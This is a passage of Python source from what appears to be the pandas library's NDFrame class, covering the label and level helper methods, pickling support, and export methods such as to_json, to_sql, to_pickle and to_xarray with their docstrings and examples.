.. versionadded:: 0.21.0
Returns
-------
renamed : type of caller or None if inplace=True
See Also
--------
pandas.DataFrame.rename
pandas.Series.rename
pandas.Index.rename
Examples
--------
>>> df._set_axis_name("foo")
A
foo
0 1
1 2
2 3
>>> df.index = pd.MultiIndex.from_product([['A'], ['a', 'b', 'c']])
>>> df._set_axis_name(["bar", "baz"])
A
bar baz
A a 1
b 2
c 3
"""
axis = self._get_axis_number(axis)
idx = self._get_axis(axis).set_names(name)
inplace = validate_bool_kwarg(inplace, 'inplace')
renamed = self if inplace else self.copy()
renamed.set_axis(idx, axis=axis, inplace=True)
if not inplace:
return renamed
# ----------------------------------------------------------------------
# Comparisons
def _indexed_same(self, other):
return all(self._get_axis(a).equals(other._get_axis(a))
for a in self._AXIS_ORDERS)
def __neg__(self):
values = com._values_from_object(self)
if is_bool_dtype(values):
arr = operator.inv(values)
elif (is_numeric_dtype(values) or is_timedelta64_dtype(values)):
arr = operator.neg(values)
else:
raise TypeError("Unary negative expects numeric dtype, not {}"
.format(values.dtype))
return self.__array_wrap__(arr)
def __pos__(self):
values = com._values_from_object(self)
if (is_bool_dtype(values) or is_period_arraylike(values)):
arr = values
elif (is_numeric_dtype(values) or is_timedelta64_dtype(values)):
arr = operator.pos(values)
else:
raise TypeError("Unary plus expects numeric dtype, not {}"
.format(values.dtype))
return self.__array_wrap__(arr)
def __invert__(self):
try:
arr = operator.inv(com._values_from_object(self))
return self.__array_wrap__(arr)
except Exception:
# inv fails with 0 len
if not np.prod(self.shape):
return self
raise
def equals(self, other):
"""
Determines if two NDFrame objects contain the same elements. NaNs in
the same location are considered equal.
"""
if not isinstance(other, self._constructor):
return False
return self._data.equals(other._data)
# -------------------------------------------------------------------------
# Label or Level Combination Helpers
#
# A collection of helper methods for DataFrame/Series operations that
# accept a combination of column/index labels and levels. All such
# operations should utilize/extend these methods when possible so that we
# have consistent precedence and validation logic throughout the library.
def _is_level_reference(self, key, axis=0):
"""
Test whether a key is a level reference for a given axis.
To be considered a level reference, `key` must be a string that:
- (axis=0): Matches the name of an index level and does NOT match
a column label.
- (axis=1): Matches the name of a column level and does NOT match
an index label.
Parameters
----------
key: str
Potential level name for the given axis
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
Returns
-------
is_level: bool
"""
axis = self._get_axis_number(axis)
if self.ndim > 2:
raise NotImplementedError(
"_is_level_reference is not implemented for {type}"
.format(type=type(self)))
return (key is not None and
is_hashable(key) and
key in self.axes[axis].names and
not self._is_label_reference(key, axis=axis))
def _is_label_reference(self, key, axis=0):
"""
Test whether a key is a label reference for a given axis.
To be considered a label reference, `key` must be a string that:
- (axis=0): Matches a column label
- (axis=1): Matches an index label
Parameters
----------
key: str
Potential label name
axis: int, default 0
Axis perpendicular to the axis that labels are associated with
(0 means search for column labels, 1 means search for index labels)
Returns
-------
is_label: bool
"""
axis = self._get_axis_number(axis)
other_axes = [ax for ax in range(self._AXIS_LEN) if ax != axis]
if self.ndim > 2:
raise NotImplementedError(
"_is_label_reference is not implemented for {type}"
.format(type=type(self)))
return (key is not None and
is_hashable(key) and
any(key in self.axes[ax] for ax in other_axes))
def _is_label_or_level_reference(self, key, axis=0):
"""
Test whether a key is a label or level reference for a given axis.
To be considered either a label or a level reference, `key` must be a
string that:
- (axis=0): Matches a column label or an index level
- (axis=1): Matches an index label or a column level
Parameters
----------
key: str
Potential label or level name
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
Returns
-------
is_label_or_level: bool
"""
if self.ndim > 2:
raise NotImplementedError(
"_is_label_or_level_reference is not implemented for {type}"
.format(type=type(self)))
return (self._is_level_reference(key, axis=axis) or
self._is_label_reference(key, axis=axis))
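    # A hedged illustration (not part of the original docstrings): with a
    # named index level, a key may resolve to a column label, an index level,
    # or both.
    # >>> df = pd.DataFrame({'a': [1, 2]},
    # ...                   index=pd.Index(['x', 'y'], name='idx'))
    # >>> df._is_label_reference('a')       # matches a column label
    # True
    # >>> df._is_level_reference('idx')     # matches an index level only
    # True
    # >>> df._is_label_or_level_reference('idx')
    # True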
def _check_label_or_level_ambiguity(self, key, axis=0, stacklevel=1):
"""
Check whether `key` matches both a level of the input `axis` and a
label of the other axis and raise a ``FutureWarning`` if this is the
case.
Note: This method will be altered to raise an ambiguity exception in
a future version.
Parameters
----------
key: str or object
label or level name
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
stacklevel: int, default 1
Stack level used when a FutureWarning is raised (see below).
Returns
-------
ambiguous: bool
Raises
------
FutureWarning
if `key` is ambiguous. This will become an ambiguity error in a
future version
"""
axis = self._get_axis_number(axis)
other_axes = [ax for ax in range(self._AXIS_LEN) if ax != axis]
if self.ndim > 2:
raise NotImplementedError(
"_check_label_or_level_ambiguity is not implemented for {type}"
.format(type=type(self)))
if (key is not None and
is_hashable(key) and
key in self.axes[axis].names and
any(key in self.axes[ax] for ax in other_axes)):
# Build an informative and grammatical warning
level_article, level_type = (('an', 'index')
if axis == 0 else
('a', 'column'))
label_article, label_type = (('a', 'column')
if axis == 0 else
('an', 'index'))
msg = ("'{key}' is both {level_article} {level_type} level and "
"{label_article} {label_type} label.\n"
"Defaulting to {label_type}, but this will raise an "
"ambiguity error in a future version"
).format(key=key,
level_article=level_article,
level_type=level_type,
label_article=label_article,
label_type=label_type)
warnings.warn(msg, FutureWarning, stacklevel=stacklevel + 1)
return True
else:
return False
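    # A hedged illustration (not part of the original docstring): a key that
    # names both an index level and a column label triggers the warning.
    # >>> df = pd.DataFrame({'a': [1, 2]},
    # ...                   index=pd.Index(['x', 'y'], name='a'))
    # >>> df._check_label_or_level_ambiguity('a')   # doctest: +SKIP
    # FutureWarning: 'a' is both an index level and a column label. ...
    # True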
def _get_label_or_level_values(self, key, axis=0, stacklevel=1):
"""
Return a 1-D array of values associated with `key`, a label or level
from the given `axis`.
Retrieval logic:
- (axis=0): Return column values if `key` matches a column label.
Otherwise return index level values if `key` matches an index
level.
- (axis=1): Return row values if `key` matches an index label.
Otherwise return column level values if 'key' matches a column
level
Parameters
----------
key: str
Label or level name.
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
stacklevel: int, default 1
Stack level used when a FutureWarning is raised (see below).
Returns
-------
values: np.ndarray
Raises
------
KeyError
if `key` matches neither a label nor a level
ValueError
if `key` matches multiple labels
FutureWarning
if `key` is ambiguous. This will become an ambiguity error in a
future version
"""
axis = self._get_axis_number(axis)
other_axes = [ax for ax in range(self._AXIS_LEN) if ax != axis]
if self.ndim > 2:
raise NotImplementedError(
"_get_label_or_level_values is not implemented for {type}"
.format(type=type(self)))
if self._is_label_reference(key, axis=axis):
self._check_label_or_level_ambiguity(key, axis=axis,
stacklevel=stacklevel + 1)
values = self.xs(key, axis=other_axes[0])._values
elif self._is_level_reference(key, axis=axis):
values = self.axes[axis].get_level_values(key)._values
else:
raise KeyError(key)
# Check for duplicates
if values.ndim > 1:
if other_axes and isinstance(
self._get_axis(other_axes[0]), MultiIndex):
multi_message = ('\n'
'For a multi-index, the label must be a '
'tuple with elements corresponding to '
'each level.')
else:
multi_message = ''
label_axis_name = 'column' if axis == 0 else 'index'
raise ValueError(("The {label_axis_name} label '{key}' "
"is not unique.{multi_message}")
.format(key=key,
label_axis_name=label_axis_name,
multi_message=multi_message))
return values
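    # A hedged illustration (not part of the original docstring): column
    # labels take precedence over index levels when both could match.
    # >>> df = pd.DataFrame({'a': [1, 2]},
    # ...                   index=pd.Index(['x', 'y'], name='idx'))
    # >>> df._get_label_or_level_values('a')        # column values
    # array([1, 2])
    # >>> df._get_label_or_level_values('idx')      # index level values
    # array(['x', 'y'], dtype=object)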
def _drop_labels_or_levels(self, keys, axis=0):
"""
Drop labels and/or levels for the given `axis`.
For each key in `keys`:
- (axis=0): If key matches a column label then drop the column.
Otherwise if key matches an index level then drop the level.
- (axis=1): If key matches an index label then drop the row.
Otherwise if key matches a column level then drop the level.
Parameters
----------
keys: str or list of str
labels or levels to drop
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
Returns
-------
dropped: DataFrame
Raises
------
ValueError
if any `keys` match neither a label nor a level
"""
axis = self._get_axis_number(axis)
if self.ndim > 2:
raise NotImplementedError(
"_drop_labels_or_levels is not implemented for {type}"
.format(type=type(self)))
# Validate keys
keys = com._maybe_make_list(keys)
invalid_keys = [k for k in keys if not
self._is_label_or_level_reference(k, axis=axis)]
if invalid_keys:
raise ValueError(("The following keys are not valid labels or "
"levels for axis {axis}: {invalid_keys}")
.format(axis=axis,
invalid_keys=invalid_keys))
# Compute levels and labels to drop
levels_to_drop = [k for k in keys
if self._is_level_reference(k, axis=axis)]
labels_to_drop = [k for k in keys
if not self._is_level_reference(k, axis=axis)]
# Perform copy upfront and then use inplace operations below.
# This ensures that we always perform exactly one copy.
# ``copy`` and/or ``inplace`` options could be added in the future.
dropped = self.copy()
if axis == 0:
# Handle dropping index levels
if levels_to_drop:
dropped.reset_index(levels_to_drop, drop=True, inplace=True)
# Handle dropping columns labels
if labels_to_drop:
dropped.drop(labels_to_drop, axis=1, inplace=True)
else:
# Handle dropping column levels
if levels_to_drop:
if isinstance(dropped.columns, MultiIndex):
# Drop the specified levels from the MultiIndex
dropped.columns = dropped.columns.droplevel(levels_to_drop)
else:
# Drop the last level of Index by replacing with
# a RangeIndex
dropped.columns = RangeIndex(dropped.columns.size)
# Handle dropping index labels
if labels_to_drop:
dropped.drop(labels_to_drop, axis=0, inplace=True)
return dropped
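    # A hedged illustration (not part of the original docstring): keys naming
    # a column are dropped as columns, keys naming an index level are dropped
    # by resetting that level.
    # >>> df = pd.DataFrame({'a': [1, 2], 'b': [3, 4]},
    # ...                   index=pd.Index(['x', 'y'], name='idx'))
    # >>> df._drop_labels_or_levels(['b', 'idx'])
    #    a
    # 0  1
    # 1  2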
# ----------------------------------------------------------------------
# Iteration
def __hash__(self):
raise TypeError('{0!r} objects are mutable, thus they cannot be'
' hashed'.format(self.__class__.__name__))
def __iter__(self):
"""Iterate over infor axis"""
return iter(self._info_axis)
# can we get a better explanation of this?
def keys(self):
"""Get the 'info axis' (see Indexing for more)
This is index for Series, columns for DataFrame and major_axis for
Panel.
"""
return self._info_axis
def iteritems(self):
"""Iterate over (label, values) on info axis
This is index for Series, columns for DataFrame, major_axis for Panel,
and so on.
"""
for h in self._info_axis:
yield h, self[h]
def __len__(self):
"""Returns length of info axis"""
return len(self._info_axis)
def __contains__(self, key):
"""True if the key is in the info axis"""
return key in self._info_axis
@property
def empty(self):
"""
Indicator whether DataFrame is empty.
True if DataFrame is entirely empty (no items), meaning any of the
axes are of length 0.
Returns
-------
bool
If DataFrame is empty, return True, if not return False.
Notes
-----
If DataFrame contains only NaNs, it is still not considered empty. See
the example below.
Examples
--------
An example of an actual empty DataFrame. Notice the index is empty:
>>> df_empty = pd.DataFrame({'A' : []})
>>> df_empty
Empty DataFrame
Columns: [A]
Index: []
>>> df_empty.empty
True
If we only have NaNs in our DataFrame, it is not considered empty! We
will need to drop the NaNs to make the DataFrame empty:
>>> df = pd.DataFrame({'A' : [np.nan]})
>>> df
A
0 NaN
>>> df.empty
False
>>> df.dropna().empty
True
See also
--------
pandas.Series.dropna
pandas.DataFrame.dropna
"""
return any(len(self._get_axis(a)) == 0 for a in self._AXIS_ORDERS)
def __nonzero__(self):
raise ValueError("The truth value of a {0} is ambiguous. "
"Use a.empty, a.bool(), a.item(), a.any() or a.all()."
.format(self.__class__.__name__))
__bool__ = __nonzero__
def bool(self):
"""Return the bool of a single element PandasObject.
This must be a boolean scalar value, either True or False. Raise a
        ValueError if the PandasObject does not have exactly 1 element, or if
        that element is not boolean.
"""
v = self.squeeze()
if isinstance(v, (bool, np.bool_)):
return bool(v)
elif is_scalar(v):
raise ValueError("bool cannot act on a non-boolean single element "
"{0}".format(self.__class__.__name__))
self.__nonzero__()
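    # A hedged illustration (not part of the original docstring): only a
    # single boolean element can be reduced; anything else raises.
    # >>> pd.Series([True]).bool()
    # True
    # >>> pd.Series([False]).bool()
    # False
    # >>> pd.Series([True, False]).bool()           # doctest: +SKIP
    # ValueError: The truth value of a Series is ambiguous. ...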
def __abs__(self):
return self.abs()
def __round__(self, decimals=0):
return self.round(decimals)
# ----------------------------------------------------------------------
# Array Interface
def __array__(self, dtype=None):
return com._values_from_object(self)
def __array_wrap__(self, result, context=None):
d = self._construct_axes_dict(self._AXIS_ORDERS, copy=False)
return self._constructor(result, **d).__finalize__(self)
# ideally we would define this to avoid the getattr checks, but
    # it is slower
# @property
# def __array_interface__(self):
# """ provide numpy array interface method """
# values = self.values
# return dict(typestr=values.dtype.str,shape=values.shape,data=values)
def to_dense(self):
"""Return dense representation of NDFrame (as opposed to sparse)"""
# compat
return self
# ----------------------------------------------------------------------
# Picklability
def __getstate__(self):
meta = {k: getattr(self, k, None) for k in self._metadata}
return dict(_data=self._data, _typ=self._typ, _metadata=self._metadata,
**meta)
def __setstate__(self, state):
if isinstance(state, BlockManager):
self._data = state
elif isinstance(state, dict):
typ = state.get('_typ')
if typ is not None:
# set in the order of internal names
# to avoid definitional recursion
# e.g. say fill_value needing _data to be
# defined
meta = set(self._internal_names + self._metadata)
for k in list(meta):
if k in state:
v = state[k]
object.__setattr__(self, k, v)
for k, v in state.items():
if k not in meta:
object.__setattr__(self, k, v)
else:
self._unpickle_series_compat(state)
elif isinstance(state[0], dict):
if len(state) == 5:
self._unpickle_sparse_frame_compat(state)
else:
self._unpickle_frame_compat(state)
elif len(state) == 4:
self._unpickle_panel_compat(state)
elif len(state) == 2:
self._unpickle_series_compat(state)
else: # pragma: no cover
# old pickling format, for compatibility
self._unpickle_matrix_compat(state)
self._item_cache = {}
# ----------------------------------------------------------------------
# IO
def _repr_latex_(self):
"""
Returns a LaTeX representation for a particular object.
Mainly for use with nbconvert (jupyter notebook conversion to pdf).
"""
if config.get_option('display.latex.repr'):
return self.to_latex()
else:
return None
# ----------------------------------------------------------------------
# I/O Methods
_shared_docs['to_excel'] = """
Write %(klass)s to an excel sheet
%(versionadded_to_excel)s
Parameters
----------
excel_writer : string or ExcelWriter object
File path or existing ExcelWriter
sheet_name : string, default 'Sheet1'
Name of sheet which will contain DataFrame
na_rep : string, default ''
Missing data representation
float_format : string, default None
Format string for floating point numbers
columns : sequence, optional
Columns to write
header : boolean or list of string, default True
Write out the column names. If a list of strings is given it is
assumed to be aliases for the column names
index : boolean, default True
Write row names (index)
index_label : string or sequence, default None
Column label for index column(s) if desired. If None is given, and
`header` and `index` are True, then the index names are used. A
sequence should be given if the DataFrame uses MultiIndex.
    startrow : int, default 0
        upper left cell row to dump data frame
    startcol : int, default 0
        upper left cell column to dump data frame
engine : string, default None
write engine to use - you can also set this via the options
``io.excel.xlsx.writer``, ``io.excel.xls.writer``, and
``io.excel.xlsm.writer``.
merge_cells : boolean, default True
Write MultiIndex and Hierarchical Rows as merged cells.
encoding: string, default None
encoding of the resulting excel file. Only necessary for xlwt,
other writers support unicode natively.
inf_rep : string, default 'inf'
Representation for infinity (there is no native representation for
infinity in Excel)
freeze_panes : tuple of integer (length 2), default None
Specifies the one-based bottommost row and rightmost column that
is to be frozen
.. versionadded:: 0.20.0
Notes
-----
If passing an existing ExcelWriter object, then the sheet will be added
to the existing workbook. This can be used to save different
DataFrames to one workbook:
>>> writer = pd.ExcelWriter('output.xlsx')
>>> df1.to_excel(writer,'Sheet1')
>>> df2.to_excel(writer,'Sheet2')
>>> writer.save()
For compatibility with to_csv, to_excel serializes lists and dicts to
strings before writing.
"""
def to_json(self, path_or_buf=None, orient=None, date_format=None,
double_precision=10, force_ascii=True, date_unit='ms',
default_handler=None, lines=False, compression=None,
index=True):
"""
Convert the object to a JSON string.
        Note NaNs and None will be converted to null and datetime objects
will be converted to UNIX timestamps.
Parameters
----------
path_or_buf : string or file handle, optional
File path or object. If not specified, the result is returned as
a string.
orient : string
Indication of expected JSON string format.
* Series
- default is 'index'
- allowed values are: {'split','records','index'}
* DataFrame
- default is 'columns'
- allowed values are:
{'split','records','index','columns','values'}
* The format of the JSON string
- 'split' : dict like {'index' -> [index],
'columns' -> [columns], 'data' -> [values]}
- 'records' : list like
[{column -> value}, ... , {column -> value}]
- 'index' : dict like {index -> {column -> value}}
- 'columns' : dict like {column -> {index -> value}}
- 'values' : just the values array
- 'table' : dict like {'schema': {schema}, 'data': {data}}
describing the data, and the data component is
like ``orient='records'``.
.. versionchanged:: 0.20.0
date_format : {None, 'epoch', 'iso'}
Type of date conversion. 'epoch' = epoch milliseconds,
'iso' = ISO8601. The default depends on the `orient`. For
``orient='table'``, the default is 'iso'. For all other orients,
the default is 'epoch'.
double_precision : int, default 10
The number of decimal places to use when encoding
floating point values.
force_ascii : boolean, default True
Force encoded string to be ASCII.
date_unit : string, default 'ms' (milliseconds)
The time unit to encode to, governs timestamp and ISO8601
precision. One of 's', 'ms', 'us', 'ns' for second, millisecond,
microsecond, and nanosecond respectively.
default_handler : callable, default None
Handler to call if object cannot otherwise be converted to a
suitable format for JSON. Should receive a single argument which is
the object to convert and return a serialisable object.
lines : boolean, default False
If 'orient' is 'records' write out line delimited json format. Will
throw ValueError if incorrect 'orient' since others are not list
like.
.. versionadded:: 0.19.0
compression : {None, 'gzip', 'bz2', 'zip', 'xz'}
A string representing the compression to use in the output file,
only used when the first argument is a filename.
.. versionadded:: 0.21.0
index : boolean, default True
Whether to include the index values in the JSON string. Not
including the index (``index=False``) is only supported when
orient is 'split' or 'table'.
.. versionadded:: 0.23.0
See Also
--------
pandas.read_json
Examples
--------
>>> df = pd.DataFrame([['a', 'b'], ['c', 'd']],
... index=['row 1', 'row 2'],
... columns=['col 1', 'col 2'])
>>> df.to_json(orient='split')
'{"columns":["col 1","col 2"],
"index":["row 1","row 2"],
"data":[["a","b"],["c","d"]]}'
Encoding/decoding a Dataframe using ``'records'`` formatted JSON.
Note that index labels are not preserved with this encoding.
>>> df.to_json(orient='records')
'[{"col 1":"a","col 2":"b"},{"col 1":"c","col 2":"d"}]'
Encoding/decoding a Dataframe using ``'index'`` formatted JSON:
>>> df.to_json(orient='index')
'{"row 1":{"col 1":"a","col 2":"b"},"row 2":{"col 1":"c","col 2":"d"}}'
Encoding/decoding a Dataframe using ``'columns'`` formatted JSON:
>>> df.to_json(orient='columns')
'{"col 1":{"row 1":"a","row 2":"c"},"col 2":{"row 1":"b","row 2":"d"}}'
Encoding/decoding a Dataframe using ``'values'`` formatted JSON:
>>> df.to_json(orient='values')
'[["a","b"],["c","d"]]'
Encoding with Table Schema
>>> df.to_json(orient='table')
'{"schema": {"fields": [{"name": "index", "type": "string"},
{"name": "col 1", "type": "string"},
{"name": "col 2", "type": "string"}],
"primaryKey": "index",
"pandas_version": "0.20.0"},
"data": [{"index": "row 1", "col 1": "a", "col 2": "b"},
{"index": "row 2", "col 1": "c", "col 2": "d"}]}'
"""
from pandas.io import json
if date_format is None and orient == 'table':
date_format = 'iso'
elif date_format is None:
date_format = 'epoch'
return json.to_json(path_or_buf=path_or_buf, obj=self, orient=orient,
date_format=date_format,
double_precision=double_precision,
force_ascii=force_ascii, date_unit=date_unit,
default_handler=default_handler,
lines=lines, compression=compression,
index=index)
def to_hdf(self, path_or_buf, key, **kwargs):
"""
Write the contained data to an HDF5 file using HDFStore.
Hierarchical Data Format (HDF) is self-describing, allowing an
application to interpret the structure and contents of a file with
no outside information. One HDF file can hold a mix of related objects
which can be accessed as a group or as individual objects.
In order to add another DataFrame or Series to an existing HDF file
        please use append mode and a different key.
For more information see the :ref:`user guide <io.html#io-hdf5>`.
Parameters
----------
path_or_buf : str or pandas.HDFStore
File path or HDFStore object.
key : str
Identifier for the group in the store.
mode : {'a', 'w', 'r+'}, default 'a'
Mode to open file:
- 'w': write, a new file is created (an existing file with
the same name would be deleted).
- 'a': append, an existing file is opened for reading and
writing, and if the file does not exist it is created.
- 'r+': similar to 'a', but the file must already exist.
format : {'fixed', 'table'}, default 'fixed'
Possible values:
- 'fixed': Fixed format. Fast writing/reading. Not-appendable,
nor searchable.
- 'table': Table format. Write as a PyTables Table structure
which may perform worse but allow more flexible operations
like searching / selecting subsets of the data.
append : bool, default False
For Table formats, append the input data to the existing.
data_columns : list of columns or True, optional
List of columns to create as indexed data columns for on-disk
queries, or True to use all columns. By default only the axes
of the object are indexed. See `here
<http://pandas.pydata.org/pandas-docs/stable/io.html#query-via-data-columns>`__.
Applicable only to format='table'.
complevel : {0-9}, optional
Specifies a compression level for data.
A value of 0 disables compression.
complib : {'zlib', 'lzo', 'bzip2', 'blosc'}, default 'zlib'
Specifies the compression library to be used.
As of v0.20.2 these additional compressors for Blosc are supported
(default if no compressor specified: 'blosc:blosclz'):
{'blosc:blosclz', 'blosc:lz4', 'blosc:lz4hc', 'blosc:snappy',
'blosc:zlib', 'blosc:zstd'}.
Specifying a compression library which is not available issues
a ValueError.
fletcher32 : bool, default False
If applying compression use the fletcher32 checksum.
dropna : bool, default False
If true, ALL nan rows will not be written to store.
See Also
--------
DataFrame.read_hdf : Read from HDF file.
DataFrame.to_parquet : Write a DataFrame to the binary parquet format.
DataFrame.to_sql : Write to a sql table.
DataFrame.to_feather : Write out feather-format for DataFrames.
DataFrame.to_csv : Write out to a csv file.
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]},
... index=['a', 'b', 'c'])
>>> df.to_hdf('data.h5', key='df', mode='w')
We can add another object to the same file:
>>> s = pd.Series([1, 2, 3, 4])
>>> s.to_hdf('data.h5', key='s')
Reading from HDF file:
>>> pd.read_hdf('data.h5', 'df')
A B
a 1 4
b 2 5
c 3 6
>>> pd.read_hdf('data.h5', 's')
0 1
1 2
2 3
3 4
dtype: int64
Deleting file with data:
>>> import os
>>> os.remove('data.h5')
"""
from pandas.io import pytables
return pytables.to_hdf(path_or_buf, key, self, **kwargs)
def to_msgpack(self, path_or_buf=None, encoding='utf-8', **kwargs):
"""
msgpack (serialize) object to input file path
THIS IS AN EXPERIMENTAL LIBRARY and the storage format
may not be stable until a future release.
Parameters
----------
path : string File path, buffer-like, or None
if None, return generated string
append : boolean whether to append to an existing msgpack
(default is False)
        compress : type of compressor (zlib or blosc), default None (no
compression)
"""
from pandas.io import packers
return packers.to_msgpack(path_or_buf, self, encoding=encoding,
**kwargs)
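    # A hedged round-trip sketch (not part of the original docstring); it
    # assumes the companion ``pd.read_msgpack`` reader accepts the bytes
    # returned when ``path_or_buf`` is None.
    # >>> df = pd.DataFrame({'a': [1, 2, 3]})
    # >>> packed = df.to_msgpack()
    # >>> pd.read_msgpack(packed).equals(df)
    # True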
def to_sql(self, name, con, schema=None, if_exists='fail', index=True,
index_label=None, chunksize=None, dtype=None):
"""
Write records stored in a DataFrame to a SQL database.
Databases supported by SQLAlchemy [1]_ are supported. Tables can be
newly created, appended to, or overwritten.
Parameters
----------
name : string
Name of SQL table.
con : sqlalchemy.engine.Engine or sqlite3.Connection
Using SQLAlchemy makes it possible to use any DB supported by that
library. Legacy support is provided for sqlite3.Connection objects.
schema : string, optional
Specify the schema (if database flavor supports this). If None, use
default schema.
if_exists : {'fail', 'replace', 'append'}, default 'fail'
How to behave if the table already exists.
* fail: Raise a ValueError.
* replace: Drop the table before inserting new values.
* append: Insert new values to the existing table.
index : boolean, default True
Write DataFrame index as a column. Uses `index_label` as the column
name in the table.
index_label : string or sequence, default None
Column label for index column(s). If None is given (default) and
`index` is True, then the index names are used.
A sequence should be given if the DataFrame uses MultiIndex.
chunksize : int, optional
Rows will be written in batches of this size at a time. By default,
all rows will be written at once.
dtype : dict, optional
Specifying the datatype for columns. The keys should be the column
names and the values should be the SQLAlchemy types or strings for
the sqlite3 legacy mode.
Raises
------
ValueError
When the table already exists and `if_exists` is 'fail' (the
default).
See Also
--------
pandas.read_sql : read a DataFrame from a table
References
----------
.. [1] http://docs.sqlalchemy.org
.. [2] https://www.python.org/dev/peps/pep-0249/
Examples
--------
Create an in-memory SQLite database.
>>> from sqlalchemy import create_engine
>>> engine = create_engine('sqlite://', echo=False)
Create a table from scratch with 3 rows.
>>> df = pd.DataFrame({'name' : ['User 1', 'User 2', 'User 3']})
>>> df
name
0 User 1
1 User 2
2 User 3
>>> df.to_sql('users', con=engine)
>>> engine.execute("SELECT * FROM users").fetchall()
[(0, 'User 1'), (1, 'User 2'), (2, 'User 3')]
>>> df1 = pd.DataFrame({'name' : ['User 4', 'User 5']})
>>> df1.to_sql('users', con=engine, if_exists='append')
>>> engine.execute("SELECT * FROM users").fetchall()
[(0, 'User 1'), (1, 'User 2'), (2, 'User 3'),
(0, 'User 4'), (1, 'User 5')]
Overwrite the table with just ``df1``.
>>> df1.to_sql('users', con=engine, if_exists='replace',
... index_label='id')
>>> engine.execute("SELECT * FROM users").fetchall()
[(0, 'User 4'), (1, 'User 5')]
Specify the dtype (especially useful for integers with missing values).
Notice that while pandas is forced to store the data as floating point,
the database supports nullable integers. When fetching the data with
Python, we get back integer scalars.
>>> df = pd.DataFrame({"A": [1, None, 2]})
>>> df
A
0 1.0
1 NaN
2 2.0
>>> from sqlalchemy.types import Integer
>>> df.to_sql('integers', con=engine, index=False,
... dtype={"A": Integer()})
>>> engine.execute("SELECT * FROM integers").fetchall()
[(1,), (None,), (2,)]
"""
from pandas.io import sql
sql.to_sql(self, name, con, schema=schema, if_exists=if_exists,
index=index, index_label=index_label, chunksize=chunksize,
dtype=dtype)
def to_pickle(self, path, compression='infer',
protocol=pkl.HIGHEST_PROTOCOL):
"""
Pickle (serialize) object to file.
Parameters
----------
path : str
File path where the pickled object will be stored.
compression : {'infer', 'gzip', 'bz2', 'zip', 'xz', None}, \
default 'infer'
A string representing the compression to use in the output file. By
default, infers from the file extension in specified path.
.. versionadded:: 0.20.0
protocol : int
Int which indicates which protocol should be used by the pickler,
default HIGHEST_PROTOCOL (see [1], paragraph 12.1.2). The possible
values for this parameter depend on the version of Python. For
Python 2.x, possible values are 0, 1, 2. For Python>=3.0, 3 is a
valid value. For Python >= 3.4, 4 is a valid value. A negative
value for the protocol parameter is equivalent to setting its value
to HIGHEST_PROTOCOL.
.. [1] https://docs.python.org/3/library/pickle.html
.. versionadded:: 0.21.0
See Also
--------
read_pickle : Load pickled pandas object (or any object) from file.
DataFrame.to_hdf : Write DataFrame to an HDF5 file.
DataFrame.to_sql : Write DataFrame to a SQL database.
DataFrame.to_parquet : Write a DataFrame to the binary parquet format.
Examples
--------
>>> original_df = pd.DataFrame({"foo": range(5), "bar": range(5, 10)})
>>> original_df
foo bar
0 0 5
1 1 6
2 2 7
3 3 8
4 4 9
>>> original_df.to_pickle("./dummy.pkl")
>>> unpickled_df = pd.read_pickle("./dummy.pkl")
>>> unpickled_df
foo bar
0 0 5
1 1 6
2 2 7
3 3 8
4 4 9
>>> import os
>>> os.remove("./dummy.pkl")
"""
from pandas.io.pickle import to_pickle
return to_pickle(self, path, compression=compression,
protocol=protocol)
def to_clipboard(self, excel=True, sep=None, **kwargs):
r"""
Copy object to the system clipboard.
Write a text representation of object to the system clipboard.
This can be pasted into Excel, for example.
Parameters
----------
excel : bool, default True
- True, use the provided separator, writing in a csv format for
allowing easy pasting into excel.
- False, write a string representation of the object to the
clipboard.
sep : str, default ``'\t'``
Field delimiter.
**kwargs
These parameters will be passed to DataFrame.to_csv.
See Also
--------
DataFrame.to_csv : Write a DataFrame to a comma-separated values
(csv) file.
read_clipboard : Read text from clipboard and pass to read_table.
Notes
-----
Requirements for your platform.
- Linux : `xclip`, or `xsel` (with `gtk` or `PyQt4` modules)
- Windows : none
- OS X : none
Examples
--------
Copy the contents of a DataFrame to the clipboard.
>>> df = pd.DataFrame([[1, 2, 3], [4, 5, 6]], columns=['A', 'B', 'C'])
>>> df.to_clipboard(sep=',')
... # Wrote the following to the system clipboard:
... # ,A,B,C
... # 0,1,2,3
... # 1,4,5,6
        We can omit the index by passing the keyword `index` and setting
        it to False.
>>> df.to_clipboard(sep=',', index=False)
... # Wrote the following to the system clipboard:
... # A,B,C
... # 1,2,3
... # 4,5,6
"""
from pandas.io import clipboards
clipboards.to_clipboard(self, excel=excel, sep=sep, **kwargs)
def to_xarray(self):
"""
Return an xarray object from the pandas object.
Returns
-------
a DataArray for a Series
a Dataset for a DataFrame
a DataArray for higher dims
Examples
--------
>>> df = pd.DataFrame({'A' : [1, 1, 2],
'B' : ['foo', 'bar', 'foo'],
'C' : np.arange(4.,7)})
>>> df
A B C
0 1 foo 4.0
1 1 bar 5.0
2 2 foo 6.0
>>> df.to_xarray()
<xarray.Dataset>
Dimensions: (index: 3)
Coordinates:
* index (index) int64 0 1 2
Data variables:
A (index) int64 1 1 2
B (index) object 'foo' 'bar' 'foo'
C (index) float64 4.0 5.0 6.0
>>> df = pd.DataFrame({'A' : [1, 1, 2],
'B' : ['foo', 'bar', 'foo'],
'C' : np.arange(4.,7)}
).set_index(['B','A'])
>>> df
C
B A
foo 1 4.0
bar 1 5.0
foo 2 6.0
>>> df.to_xarray()
<xarray.Dataset>
Dimensions: (A: 2, B: 2)
Coordinates:
* B (B) object 'bar' 'foo'
* A (A) int64 1 2
Data variables:
C (B, A) float64 5.0 nan 4.0 6.0
>>> p = pd.Panel(np.arange(24).reshape(4,3,2),
items=list('ABCD'),
major_axis=pd.date_range('20130101', periods=3),
minor_axis=['first', 'second'])
>>> p
<class 'pandas.core.panel.Panel'>
Dimensions: 4 (items) x 3 (major_axis) x 2 (minor_axis)
Items axis: A to D
Major_axis axis: 2013-01-01 00:00:00 to 2013-01-03 00:00:00
Minor_axis axis: first to second
>>> p.to_xarray()
<xarray.DataArray (items: 4, major_axis: 3, minor_axis: 2)>
array([[[ 0, 1],
[ 2, 3],
[ 4, 5]],
[[ 6, 7],
[ 8, 9],
[10, 11]],
[[12, 13],
[14, 15],
[16, 17]],
[[18, 19],
[20, 21],
